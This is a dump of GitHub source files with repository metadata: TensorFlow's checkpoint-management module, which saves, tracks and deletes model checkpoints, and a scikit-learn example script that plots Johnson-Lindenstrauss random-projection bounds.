"content_hash": "f1d549e11ecb63a4cd52f2ba21be5fb9",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 84,
"avg_line_length": 37.25,
"alnum_prop": 0.6756152125279642,
"repo_name": "snahelou/awx",
"id": "7c0db853096bbca1f3d22a8315e1150a465e3ebb",
"size": "456",
"binary": false,
"copies": "2",
"ref": "refs/heads/devel",
"path": "awx/main/migrations/_team_cleanup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "277672"
},
{
"name": "HTML",
"bytes": "424349"
},
{
"name": "JavaScript",
"bytes": "2903576"
},
{
"name": "Makefile",
"bytes": "20443"
},
{
"name": "Nginx",
"bytes": "2520"
},
{
"name": "PowerShell",
"bytes": "6936"
},
{
"name": "Python",
"bytes": "7328472"
},
{
"name": "Shell",
"bytes": "1068"
}
],
"symlink_target": ""
} |
"""Save and restore variables."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os.path
import re
import time
from google.protobuf import text_format
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import training_util
from tensorflow.python.training.checkpoint_state_pb2 import CheckpointState
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
def _GetCheckpointFilename(save_dir, latest_filename):
"""Returns a filename for storing the CheckpointState.
Args:
save_dir: The directory for saving and restoring checkpoints.
latest_filename: Name of the file in 'save_dir' that is used
to store the CheckpointState.
Returns:
The path of the file that contains the CheckpointState proto.
"""
if latest_filename is None:
latest_filename = "checkpoint"
return os.path.join(save_dir, latest_filename)
@tf_export(v1=["train.generate_checkpoint_state_proto"])
def generate_checkpoint_state_proto(save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=None,
all_model_checkpoint_timestamps=None,
last_preserved_timestamp=None):
"""Generates a checkpoint state proto.
Args:
save_dir: Directory where the model was saved.
model_checkpoint_path: The checkpoint file.
all_model_checkpoint_paths: List of strings. Paths to all not-yet-deleted
checkpoints, sorted from oldest to newest. If this is a non-empty list,
the last element must be equal to model_checkpoint_path. These paths
are also saved in the CheckpointState proto.
all_model_checkpoint_timestamps: A list of floats, indicating the number of
seconds since the Epoch when each checkpoint was generated.
last_preserved_timestamp: A float, indicating the number of seconds since
the Epoch when the last preserved checkpoint was written, e.g. due to a
`keep_checkpoint_every_n_hours` parameter (see
`tf.contrib.checkpoint.CheckpointManager` for an implementation).
Returns:
CheckpointState proto with model_checkpoint_path and
all_model_checkpoint_paths updated to either absolute paths or
relative paths to the current save_dir.
Raises:
ValueError: If `all_model_checkpoint_timestamps` was provided but its length
does not match `all_model_checkpoint_paths`.
"""
if all_model_checkpoint_paths is None:
all_model_checkpoint_paths = []
if (not all_model_checkpoint_paths or
all_model_checkpoint_paths[-1] != model_checkpoint_path):
logging.info("%s is not in all_model_checkpoint_paths. Manually adding it.",
model_checkpoint_path)
all_model_checkpoint_paths.append(model_checkpoint_path)
if (all_model_checkpoint_timestamps
and (len(all_model_checkpoint_timestamps)
!= len(all_model_checkpoint_paths))):
raise ValueError(
("Checkpoint timestamps, if provided, must match checkpoint paths (got "
"paths %s and timestamps %s)")
% (all_model_checkpoint_paths, all_model_checkpoint_timestamps))
# Relative paths need to be rewritten to be relative to the "save_dir"
# if model_checkpoint_path already contains "save_dir".
if not os.path.isabs(save_dir):
if not os.path.isabs(model_checkpoint_path):
model_checkpoint_path = os.path.relpath(model_checkpoint_path, save_dir)
for i in range(len(all_model_checkpoint_paths)):
p = all_model_checkpoint_paths[i]
if not os.path.isabs(p):
all_model_checkpoint_paths[i] = os.path.relpath(p, save_dir)
coord_checkpoint_proto = CheckpointState(
model_checkpoint_path=model_checkpoint_path,
all_model_checkpoint_paths=all_model_checkpoint_paths,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
return coord_checkpoint_proto
@deprecation.deprecated(
date=None,
instructions=("Use `tf.train.CheckpointManager` to manage checkpoints "
"rather than manually editing the Checkpoint proto."))
@tf_export(v1=["train.update_checkpoint_state"])
def update_checkpoint_state(save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=None,
latest_filename=None,
all_model_checkpoint_timestamps=None,
last_preserved_timestamp=None):
"""Updates the content of the 'checkpoint' file.
This updates the checkpoint file containing a CheckpointState
proto.
Args:
save_dir: Directory where the model was saved.
model_checkpoint_path: The checkpoint file.
all_model_checkpoint_paths: List of strings. Paths to all not-yet-deleted
checkpoints, sorted from oldest to newest. If this is a non-empty list,
the last element must be equal to model_checkpoint_path. These paths
are also saved in the CheckpointState proto.
latest_filename: Optional name of the checkpoint file. Default to
'checkpoint'.
all_model_checkpoint_timestamps: Optional list of timestamps (floats,
seconds since the Epoch) indicating when the checkpoints in
`all_model_checkpoint_paths` were created.
last_preserved_timestamp: A float, indicating the number of seconds since
the Epoch when the last preserved checkpoint was written, e.g. due to a
`keep_checkpoint_every_n_hours` parameter (see
`tf.contrib.checkpoint.CheckpointManager` for an implementation).
Raises:
RuntimeError: If any of the model checkpoint paths conflict with the file
containing CheckpointSate.
"""
update_checkpoint_state_internal(
save_dir=save_dir,
model_checkpoint_path=model_checkpoint_path,
all_model_checkpoint_paths=all_model_checkpoint_paths,
latest_filename=latest_filename,
save_relative_paths=False,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
def update_checkpoint_state_internal(save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=None,
latest_filename=None,
save_relative_paths=False,
all_model_checkpoint_timestamps=None,
last_preserved_timestamp=None):
"""Updates the content of the 'checkpoint' file.
This updates the checkpoint file containing a CheckpointState
proto.
Args:
save_dir: Directory where the model was saved.
model_checkpoint_path: The checkpoint file.
all_model_checkpoint_paths: List of strings. Paths to all not-yet-deleted
checkpoints, sorted from oldest to newest. If this is a non-empty list,
the last element must be equal to model_checkpoint_path. These paths
are also saved in the CheckpointState proto.
latest_filename: Optional name of the checkpoint file. Default to
'checkpoint'.
save_relative_paths: If `True`, will write relative paths to the checkpoint
state file.
all_model_checkpoint_timestamps: Optional list of timestamps (floats,
seconds since the Epoch) indicating when the checkpoints in
`all_model_checkpoint_paths` were created.
last_preserved_timestamp: A float, indicating the number of seconds since
the Epoch when the last preserved checkpoint was written, e.g. due to a
`keep_checkpoint_every_n_hours` parameter (see
`tf.contrib.checkpoint.CheckpointManager` for an implementation).
Raises:
RuntimeError: If any of the model checkpoint paths conflict with the file
containing CheckpointSate.
"""
# Writes the "checkpoint" file for the coordinator for later restoration.
coord_checkpoint_filename = _GetCheckpointFilename(save_dir, latest_filename)
if save_relative_paths:
if os.path.isabs(model_checkpoint_path):
rel_model_checkpoint_path = os.path.relpath(
model_checkpoint_path, save_dir)
else:
rel_model_checkpoint_path = model_checkpoint_path
rel_all_model_checkpoint_paths = []
for p in all_model_checkpoint_paths:
if os.path.isabs(p):
rel_all_model_checkpoint_paths.append(os.path.relpath(p, save_dir))
else:
rel_all_model_checkpoint_paths.append(p)
ckpt = generate_checkpoint_state_proto(
save_dir,
rel_model_checkpoint_path,
all_model_checkpoint_paths=rel_all_model_checkpoint_paths,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
else:
ckpt = generate_checkpoint_state_proto(
save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=all_model_checkpoint_paths,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
if coord_checkpoint_filename == ckpt.model_checkpoint_path:
raise RuntimeError("Save path '%s' conflicts with path used for "
"checkpoint state. Please use a different save path." %
model_checkpoint_path)
# Preventing potential read/write race condition by *atomically* writing to a
# file.
file_io.atomic_write_string_to_file(coord_checkpoint_filename,
text_format.MessageToString(ckpt))
@tf_export("train.get_checkpoint_state")
def get_checkpoint_state(checkpoint_dir, latest_filename=None):
"""Returns CheckpointState proto from the "checkpoint" file.
If the "checkpoint" file contains a valid CheckpointState
proto, returns it.
Args:
checkpoint_dir: The directory of checkpoints.
latest_filename: Optional name of the checkpoint file. Default to
'checkpoint'.
Returns:
A CheckpointState if the state was available, None
otherwise.
Raises:
ValueError: if the checkpoint read doesn't have model_checkpoint_path set.
"""
ckpt = None
coord_checkpoint_filename = _GetCheckpointFilename(checkpoint_dir,
latest_filename)
f = None
try:
# Check that the file exists before opening it to avoid
# many lines of errors from colossus in the logs.
if file_io.file_exists(coord_checkpoint_filename):
file_content = file_io.read_file_to_string(
coord_checkpoint_filename)
ckpt = CheckpointState()
text_format.Merge(file_content, ckpt)
if not ckpt.model_checkpoint_path:
raise ValueError("Invalid checkpoint state loaded from "
+ checkpoint_dir)
# For relative model_checkpoint_path and all_model_checkpoint_paths,
# prepend checkpoint_dir.
if not os.path.isabs(ckpt.model_checkpoint_path):
ckpt.model_checkpoint_path = os.path.join(checkpoint_dir,
ckpt.model_checkpoint_path)
for i in range(len(ckpt.all_model_checkpoint_paths)):
p = ckpt.all_model_checkpoint_paths[i]
if not os.path.isabs(p):
ckpt.all_model_checkpoint_paths[i] = os.path.join(checkpoint_dir, p)
except errors.OpError as e:
# It's ok if the file cannot be read
logging.warning("%s: %s", type(e).__name__, e)
logging.warning("%s: Checkpoint ignored", coord_checkpoint_filename)
return None
except text_format.ParseError as e:
logging.warning("%s: %s", type(e).__name__, e)
logging.warning("%s: Checkpoint ignored", coord_checkpoint_filename)
return None
finally:
if f:
f.close()
return ckpt
def _prefix_to_checkpoint_path(prefix, format_version):
"""Returns the pathname of a checkpoint file, given the checkpoint prefix.
For V1 checkpoint, simply returns the prefix itself (the data file). For V2,
returns the pathname to the index file.
Args:
prefix: a string, the prefix of a checkpoint.
format_version: the checkpoint format version that corresponds to the
prefix.
Returns:
The pathname of a checkpoint file, taking into account the checkpoint
format version.
"""
if format_version == saver_pb2.SaverDef.V2:
return prefix + ".index" # The index file identifies a checkpoint.
return prefix # Just the data file.
@tf_export("train.latest_checkpoint")
def latest_checkpoint(checkpoint_dir, latest_filename=None):
"""Finds the filename of latest saved checkpoint file.
Args:
checkpoint_dir: Directory where the variables were saved.
latest_filename: Optional name for the protocol buffer file that
contains the list of most recent checkpoint filenames.
See the corresponding argument to `Saver.save()`.
Returns:
The full path to the latest checkpoint or `None` if no checkpoint was found.
"""
# Pick the latest checkpoint based on checkpoint state.
ckpt = get_checkpoint_state(checkpoint_dir, latest_filename)
if ckpt and ckpt.model_checkpoint_path:
# Look for either a V2 path or a V1 path, with priority for V2.
v2_path = _prefix_to_checkpoint_path(ckpt.model_checkpoint_path,
saver_pb2.SaverDef.V2)
v1_path = _prefix_to_checkpoint_path(ckpt.model_checkpoint_path,
saver_pb2.SaverDef.V1)
if file_io.get_matching_files(v2_path) or file_io.get_matching_files(
v1_path):
return ckpt.model_checkpoint_path
else:
logging.error("Couldn't match files for checkpoint %s",
ckpt.model_checkpoint_path)
return None
@deprecation.deprecated(
date=None,
instructions="Use standard file APIs to check for files with this prefix.")
@tf_export(v1=["train.checkpoint_exists"])
def checkpoint_exists(checkpoint_prefix):
"""Checks whether a V1 or V2 checkpoint exists with the specified prefix.
This is the recommended way to check if a checkpoint exists, since it takes
into account the naming difference between V1 and V2 formats.
Args:
checkpoint_prefix: the prefix of a V1 or V2 checkpoint, with V2 taking
priority. Typically the result of `Saver.save()` or that of
`tf.train.latest_checkpoint()`, regardless of sharded/non-sharded or
V1/V2.
Returns:
A bool, true iff a checkpoint referred to by `checkpoint_prefix` exists.
"""
pathname = _prefix_to_checkpoint_path(checkpoint_prefix,
saver_pb2.SaverDef.V2)
if file_io.get_matching_files(pathname):
return True
elif file_io.get_matching_files(checkpoint_prefix):
return True
else:
return False
@deprecation.deprecated(
date=None,
instructions="Use standard file utilities to get mtimes.")
@tf_export(v1=["train.get_checkpoint_mtimes"])
def get_checkpoint_mtimes(checkpoint_prefixes):
"""Returns the mtimes (modification timestamps) of the checkpoints.
Globs for the checkpoints pointed to by `checkpoint_prefixes`. If the files
exist, collect their mtime. Both V2 and V1 checkpoints are considered, in
that priority.
This is the recommended way to get the mtimes, since it takes into account
the naming difference between V1 and V2 formats.
Args:
checkpoint_prefixes: a list of checkpoint paths, typically the results of
`Saver.save()` or those of `tf.train.latest_checkpoint()`, regardless of
sharded/non-sharded or V1/V2.
Returns:
A list of mtimes (in microseconds) of the found checkpoints.
"""
mtimes = []
def match_maybe_append(pathname):
fnames = file_io.get_matching_files(pathname)
if fnames:
mtimes.append(file_io.stat(fnames[0]).mtime_nsec / 1e9)
return True
return False
for checkpoint_prefix in checkpoint_prefixes:
# Tries V2's metadata file first.
pathname = _prefix_to_checkpoint_path(checkpoint_prefix,
saver_pb2.SaverDef.V2)
if match_maybe_append(pathname):
continue
# Otherwise, tries V1, where the prefix is the complete pathname.
match_maybe_append(checkpoint_prefix)
return mtimes
@deprecation.deprecated(
date=None,
instructions="Use standard file APIs to delete files with this prefix.")
@tf_export(v1=["train.remove_checkpoint"])
def remove_checkpoint(checkpoint_prefix,
checkpoint_format_version=saver_pb2.SaverDef.V2,
meta_graph_suffix="meta"):
"""Removes a checkpoint given by `checkpoint_prefix`.
Args:
checkpoint_prefix: The prefix of a V1 or V2 checkpoint. Typically the result
of `Saver.save()` or that of `tf.train.latest_checkpoint()`, regardless of
sharded/non-sharded or V1/V2.
checkpoint_format_version: `SaverDef.CheckpointFormatVersion`, defaults to
`SaverDef.V2`.
meta_graph_suffix: Suffix for `MetaGraphDef` file. Defaults to 'meta'.
"""
_delete_file_if_exists(
meta_graph_filename(checkpoint_prefix, meta_graph_suffix))
if checkpoint_format_version == saver_pb2.SaverDef.V2:
# V2 has a metadata file and some data files.
_delete_file_if_exists(checkpoint_prefix + ".index")
_delete_file_if_exists(checkpoint_prefix + ".data-?????-of-?????")
else:
# V1, Legacy. Exact match on the data file.
_delete_file_if_exists(checkpoint_prefix)
def _delete_file_if_exists(filespec):
"""Deletes files matching `filespec`."""
for pathname in file_io.get_matching_files(filespec):
file_io.delete_file(pathname)
def meta_graph_filename(checkpoint_filename, meta_graph_suffix="meta"):
"""Returns the meta graph filename.
Args:
checkpoint_filename: Name of the checkpoint file.
meta_graph_suffix: Suffix for `MetaGraphDef` file. Defaults to 'meta'.
Returns:
MetaGraph file name.
"""
# If the checkpoint_filename is sharded, the checkpoint_filename could
# be of format model.ckpt-step#-?????-of-shard#. For example,
# model.ckpt-123456-?????-of-00005, or model.ckpt-123456-00001-of-00002.
basename = re.sub(r"-[\d\?]+-of-\d+$", "", checkpoint_filename)
suffixed_filename = ".".join([basename, meta_graph_suffix])
return suffixed_filename
# TODO(allenl): Allow tf.keras.Model instances in the constructor directly?
@tf_export("train.CheckpointManager")
class CheckpointManager(object):
"""Deletes old checkpoints.
Example usage:
```python
import tensorflow as tf
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
manager = tf.contrib.checkpoint.CheckpointManager(
checkpoint, directory="/tmp/model", max_to_keep=5)
status = checkpoint.restore(manager.latest_checkpoint)
while True:
# train
manager.save()
```
`CheckpointManager` preserves its own state across instantiations (see the
`__init__` documentation for details). Only one should be active in a
particular directory at a time.
"""
def __init__(self, checkpoint, directory,
max_to_keep, keep_checkpoint_every_n_hours=None):
"""Configure a `CheckpointManager` for use in `directory`.
If a `CheckpointManager` was previously used in `directory`, its
state will be restored. This includes the list of managed checkpoints and
the timestamp bookkeeping necessary to support
`keep_checkpoint_every_n_hours`. The behavior of the new `CheckpointManager`
will be the same as the previous `CheckpointManager`, including cleaning up
existing checkpoints if appropriate.
Checkpoints are only considered for deletion just after a new checkpoint has
been added. At that point, `max_to_keep` checkpoints will remain in an
"active set". Once a checkpoint is preserved by
`keep_checkpoint_every_n_hours` it will not be deleted by this
`CheckpointManager` or any future `CheckpointManager` instantiated in
`directory` (regardless of the new setting of
`keep_checkpoint_every_n_hours`). The `max_to_keep` checkpoints in the
active set may be deleted by this `CheckpointManager` or a future
`CheckpointManager` instantiated in `directory` (subject to its
`max_to_keep` and `keep_checkpoint_every_n_hours` settings).
Args:
checkpoint: The `tf.train.Checkpoint` instance to save and manage
checkpoints for.
directory: The path to a directory in which to write checkpoints. A
special file named "checkpoint" is also written to this directory (in a
human-readable text format) which contains the state of the
`CheckpointManager`.
max_to_keep: An integer, the number of checkpoints to keep. Unless
preserved by `keep_checkpoint_every_n_hours`, checkpoints will be
deleted from the active set, oldest first, until only `max_to_keep`
checkpoints remain. If `None`, no checkpoints are deleted and everything
stays in the active set. Note that `max_to_keep=None` will keep all
checkpoint paths in memory and in the checkpoint state protocol buffer
on disk.
keep_checkpoint_every_n_hours: Upon removal from the active set, a
checkpoint will be preserved if it has been at least
`keep_checkpoint_every_n_hours` since the last preserved checkpoint. The
default setting of `None` does not preserve any checkpoints in this way.
Raises:
ValueError: If `max_to_keep` is not a positive integer.
"""
self._checkpoint = checkpoint
self._save_counter_assign = None
if max_to_keep is not None and max_to_keep <= 0:
raise ValueError(
("Expected a positive integer or `None` for `max_to_max_to_keep`, "
"got %d.")
% (max_to_keep,))
self._max_to_keep = max_to_keep
self._keep_checkpoint_every_n_hours = keep_checkpoint_every_n_hours
self._directory = directory
self._checkpoint_prefix = os.path.join(directory, "ckpt")
recovered_state = get_checkpoint_state(directory)
current_clock = time.time()
self._maybe_delete = collections.OrderedDict()
if recovered_state is None:
self._latest_checkpoint = None
# Set the clock back slightly to avoid race conditions when quckly
# re-creating a CheckpointManager.
self._last_preserved_timestamp = current_clock - 1.
else:
self._latest_checkpoint = recovered_state.model_checkpoint_path
self._last_preserved_timestamp = recovered_state.last_preserved_timestamp
if current_clock < self._last_preserved_timestamp:
# Time seems to have reversed itself. In addition to this warning, we'll
# min() saved checkpoint timestamps with the current time to ensure that
# old checkpoints don't get deleted accidentally.
logging.warning(
("time.time() returned a value %f seconds behind the last "
"preserved checkpoint timestamp.")
% (self._last_preserved_timestamp - current_clock,))
self._last_preserved_timestamp = current_clock
all_timestamps = recovered_state.all_model_checkpoint_timestamps
all_paths = recovered_state.all_model_checkpoint_paths
del recovered_state # Uses modified values from now on
if not all_timestamps:
all_timestamps = [self._last_preserved_timestamp] * len(all_paths)
for filename, timestamp in zip(all_paths, all_timestamps):
timestamp = min(timestamp, current_clock)
if timestamp > self._last_preserved_timestamp:
self._maybe_delete[filename] = timestamp
@property
def latest_checkpoint(self):
"""The prefix of the most recent checkpoint in `directory`.
Equivalent to `tf.train.latest_checkpoint(directory)` where `directory` is
the constructor argument to `CheckpointManager`.
Suitable for passing to `tf.train.Checkpoint.restore` to resume training.
Returns:
The checkpoint prefix. If there are no checkpoints, returns `None`.
"""
return self._latest_checkpoint
@property
def checkpoints(self):
"""A list of managed checkpoints.
Note that checkpoints saved due to `keep_checkpoint_every_n_hours` will not
show up in this list (to avoid ever-growing filename lists).
Returns:
A list of filenames, sorted from oldest to newest.
"""
return list(self._maybe_delete.keys())
def _sweep(self):
"""Deletes or preserves managed checkpoints."""
if not self._max_to_keep:
# Does not update self._last_preserved_timestamp, since everything is kept
# in the active set.
return
while len(self._maybe_delete) > self._max_to_keep:
filename, timestamp = self._maybe_delete.popitem(last=False)
# Even if we're keeping this checkpoint due to
# keep_checkpoint_every_n_hours, we won't reference it to avoid
# infinitely-growing CheckpointState protos.
if (self._keep_checkpoint_every_n_hours
and (timestamp - self._keep_checkpoint_every_n_hours * 3600.
>= self._last_preserved_timestamp)):
self._last_preserved_timestamp = timestamp
continue
_delete_file_if_exists(filename + ".index")
_delete_file_if_exists(filename + ".data-?????-of-?????")
def _record_state(self):
"""Saves the `CheckpointManager`'s state in `directory`."""
filenames, timestamps = zip(*self._maybe_delete.items())
update_checkpoint_state_internal(
self._directory,
model_checkpoint_path=self.latest_checkpoint,
all_model_checkpoint_paths=filenames,
all_model_checkpoint_timestamps=timestamps,
last_preserved_timestamp=self._last_preserved_timestamp,
save_relative_paths=True)
@property
def _prefix(self):
"""A common prefix for all checkpoints saved with this manager.
For example, if `directory` (a constructor argument) were `"/tmp/tf-model"`,
`prefix` would be `"/tmp/tf-model/ckpt"` and checkpoints would generally be
numbered `"/tmp/tf-model/ckpt-1"`, `"/tmp/tf-model/ckpt-2"`, and so on. Each
checkpoint has several associated files
(e.g. `"/tmp/tf-model/ckpt-2.index"`).
Returns:
A string prefix.
"""
return self._checkpoint_prefix
def save(self, checkpoint_number=None):
"""Creates a new checkpoint and manages it.
Args:
checkpoint_number: An optional integer, or an integer-dtype `Variable` or
`Tensor`, used to number the checkpoint. If `None` (default),
checkpoints are numbered using `checkpoint.save_counter`. Even if
`checkpoint_number` is provided, `save_counter` is still incremented. A
user-provided `checkpoint_number` is not incremented even if it is a
`Variable`.
Returns:
The path to the new checkpoint. It is also recorded in the `checkpoints`
and `latest_checkpoint` properies.
"""
# Save counter logic duplicated from tf.train.Checkpoint, soon to diverge
# slightly with a custom numbering option.
if context.executing_eagerly():
save_counter = self._checkpoint.save_counter
save_counter.assign_add(1)
session = None
else:
session = ops.get_default_session()
def _initializing_creator(next_creator, **kwargs):
"""Initialize the save counter if it has been newly created."""
v = next_creator(**kwargs)
session.run(v.initializer)
return v
with variable_scope.variable_creator_scope(_initializing_creator):
save_counter = self._checkpoint.save_counter
if self._save_counter_assign is None:
self._save_counter_assign = save_counter.assign_add(1, read_value=False)
session.run(self._save_counter_assign)
if checkpoint_number is None:
checkpoint_number = save_counter
if not isinstance(checkpoint_number, compat.integral_types):
checkpoint_number = training_util.global_step(
sess=session, global_step_tensor=checkpoint_number)
prefix = "%s-%d" % (self._prefix, checkpoint_number)
save_path = self._checkpoint.write(prefix)
timestamp = time.time()
# If this is an overwritten checkpoint we were previously tracking, delete
# and reinsert it to make sure it goes to the end of the queue.
if save_path in self._maybe_delete:
del self._maybe_delete[save_path]
self._maybe_delete[save_path] = timestamp
self._latest_checkpoint = save_path
self._sweep()
self._record_state()
return save_path
| {
"content_hash": "a1d75fda56d04c98d926616c36739650",
"timestamp": "",
"source": "github",
"line_count": 688,
"max_line_length": 80,
"avg_line_length": 41.93313953488372,
"alnum_prop": 0.6894974003466204,
"repo_name": "kevin-coder/tensorflow-fork",
"id": "131ecf71ba56c4c683bf1748c4681dc28507d829",
"size": "29571",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/checkpoint_management.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9117"
},
{
"name": "C",
"bytes": "340300"
},
{
"name": "C++",
"bytes": "39383425"
},
{
"name": "CMake",
"bytes": "194940"
},
{
"name": "Go",
"bytes": "1046987"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "567239"
},
{
"name": "Jupyter Notebook",
"bytes": "1940883"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48231"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "2140"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "33617202"
},
{
"name": "Ruby",
"bytes": "533"
},
{
"name": "Shell",
"bytes": "425910"
}
],
"symlink_target": ""
} |
r"""
=====================================================================
The Johnson-Lindenstrauss bound for embedding with random projections
=====================================================================
The `Johnson-Lindenstrauss lemma`_ states that any high dimensional
dataset can be randomly projected into a lower dimensional Euclidean
space while controlling the distortion in the pairwise distances.
.. _`Johnson-Lindenstrauss lemma`: https://en.wikipedia.org/wiki/\
Johnson%E2%80%93Lindenstrauss_lemma
"""
import sys
from time import time
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from sklearn.random_projection import johnson_lindenstrauss_min_dim
from sklearn.random_projection import SparseRandomProjection
from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.datasets import load_digits
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.utils.fixes import parse_version
# `normed` is being deprecated in favor of `density` in histograms
if parse_version(matplotlib.__version__) >= parse_version("2.1"):
density_param = {"density": True}
else:
density_param = {"normed": True}
# %%
# Theoretical bounds
# ==================
# The distortion introduced by a random projection `p` is asserted by
# the fact that `p` is defining an eps-embedding with good probability
# as defined by:
#
# .. math::
# (1 - eps) \|u - v\|^2 < \|p(u) - p(v)\|^2 < (1 + eps) \|u - v\|^2
#
# Where u and v are any rows taken from a dataset of shape (n_samples,
# n_features) and p is a projection by a random Gaussian N(0, 1) matrix
# of shape (n_components, n_features) (or a sparse Achlioptas matrix).
#
# The minimum number of components to guarantees the eps-embedding is
# given by:
#
# .. math::
# n\_components \geq 4 log(n\_samples) / (eps^2 / 2 - eps^3 / 3)
#
#
# The first plot shows that with an increasing number of samples ``n_samples``,
# the minimal number of dimensions ``n_components`` increased logarithmically
# in order to guarantee an ``eps``-embedding.
# range of admissible distortions
eps_range = np.linspace(0.1, 0.99, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(eps_range)))
# range of number of samples (observation) to embed
n_samples_range = np.logspace(1, 9, 9)
plt.figure()
for eps, color in zip(eps_range, colors):
min_n_components = johnson_lindenstrauss_min_dim(n_samples_range, eps=eps)
plt.loglog(n_samples_range, min_n_components, color=color)
plt.legend(["eps = %0.1f" % eps for eps in eps_range], loc="lower right")
plt.xlabel("Number of observations to eps-embed")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_samples vs n_components")
plt.show()
# %%
# The second plot shows that an increase of the admissible
# distortion ``eps`` allows to reduce drastically the minimal number of
# dimensions ``n_components`` for a given number of samples ``n_samples``
# range of admissible distortions
eps_range = np.linspace(0.01, 0.99, 100)
# range of number of samples (observation) to embed
n_samples_range = np.logspace(2, 6, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(n_samples_range)))
plt.figure()
for n_samples, color in zip(n_samples_range, colors):
min_n_components = johnson_lindenstrauss_min_dim(n_samples, eps=eps_range)
plt.semilogy(eps_range, min_n_components, color=color)
plt.legend(["n_samples = %d" % n for n in n_samples_range], loc="upper right")
plt.xlabel("Distortion eps")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_components vs eps")
plt.show()
# %%
# Empirical validation
# ====================
#
# We validate the above bounds on the 20 newsgroups text document
# (TF-IDF word frequencies) dataset or on the digits dataset:
#
# - for the 20 newsgroups dataset some 500 documents with 100k
# features in total are projected using a sparse random matrix to smaller
# euclidean spaces with various values for the target number of dimensions
# ``n_components``.
#
# - for the digits dataset, some 8x8 gray level pixels data for 500
# handwritten digits pictures are randomly projected to spaces for various
# larger number of dimensions ``n_components``.
#
# The default dataset is the 20 newsgroups dataset. To run the example on the
# digits dataset, pass the ``--use-digits-dataset`` command line argument to
# this script.
if "--use-digits-dataset" in sys.argv:
data = load_digits().data[:500]
else:
data = fetch_20newsgroups_vectorized().data[:500]
# %%
# For each value of ``n_components``, we plot:
#
# - 2D distribution of sample pairs with pairwise distances in original
# and projected spaces as x and y axis respectively.
#
# - 1D histogram of the ratio of those distances (projected / original).
n_samples, n_features = data.shape
print(
"Embedding %d samples with dim %d using various random projections"
% (n_samples, n_features)
)
n_components_range = np.array([300, 1000, 10000])
dists = euclidean_distances(data, squared=True).ravel()
# select only non-identical samples pairs
nonzero = dists != 0
dists = dists[nonzero]
for n_components in n_components_range:
t0 = time()
rp = SparseRandomProjection(n_components=n_components)
projected_data = rp.fit_transform(data)
print(
"Projected %d samples from %d to %d in %0.3fs"
% (n_samples, n_features, n_components, time() - t0)
)
if hasattr(rp, "components_"):
n_bytes = rp.components_.data.nbytes
n_bytes += rp.components_.indices.nbytes
print("Random matrix with size: %0.3fMB" % (n_bytes / 1e6))
projected_dists = euclidean_distances(projected_data, squared=True).ravel()[nonzero]
plt.figure()
min_dist = min(projected_dists.min(), dists.min())
max_dist = max(projected_dists.max(), dists.max())
plt.hexbin(
dists,
projected_dists,
gridsize=100,
cmap=plt.cm.PuBu,
extent=[min_dist, max_dist, min_dist, max_dist],
)
plt.xlabel("Pairwise squared distances in original space")
plt.ylabel("Pairwise squared distances in projected space")
plt.title("Pairwise distances distribution for n_components=%d" % n_components)
cb = plt.colorbar()
cb.set_label("Sample pairs counts")
rates = projected_dists / dists
print("Mean distances rate: %0.2f (%0.2f)" % (np.mean(rates), np.std(rates)))
plt.figure()
plt.hist(rates, bins=50, range=(0.0, 2.0), edgecolor="k", **density_param)
plt.xlabel("Squared distances rate: projected / original")
plt.ylabel("Distribution of samples pairs")
plt.title("Histogram of pairwise distance rates for n_components=%d" % n_components)
# TODO: compute the expected value of eps and add them to the previous plot
# as vertical lines / region
plt.show()
# %%
# We can see that for low values of ``n_components`` the distribution is wide
# with many distorted pairs and a skewed distribution (due to the hard
# limit of zero ratio on the left as distances are always positives)
# while for larger values of n_components the distortion is controlled
# and the distances are well preserved by the random projection.
# %%
# Remarks
# =======
#
# According to the JL lemma, projecting 500 samples without too much distortion
# will require at least several thousands dimensions, irrespective of the
# number of features of the original dataset.
#
# Hence using random projections on the digits dataset which only has 64
# features in the input space does not make sense: it does not allow
# for dimensionality reduction in this case.
#
# On the twenty newsgroups on the other hand the dimensionality can be
# decreased from 56436 down to 10000 while reasonably preserving
# pairwise distances.
| {
"content_hash": "c88e85db167b74ee80d35c7e0d9f687b",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 88,
"avg_line_length": 36.15348837209302,
"alnum_prop": 0.7016595908915476,
